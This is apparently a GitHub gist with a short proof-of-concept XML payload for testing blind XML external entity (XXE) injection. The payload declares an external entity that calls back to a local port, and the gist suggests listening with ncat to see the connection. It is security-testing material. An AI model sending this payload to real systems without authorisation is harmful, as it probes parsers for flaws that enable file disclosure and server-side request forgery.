Created
June 16, 2018 15:55
-
-
Save R41D3NN/2d904296597b859abf4de61e8d2129c7 to your computer and use it in GitHub Desktop.
Quick POC for testing XXE in controls. Just spin up ncat -l PORT. Useful for seeing the connection made for testing XXE blind.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://127.0.0.1:7777"> | |
]> | |
<r>&sp;</r> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment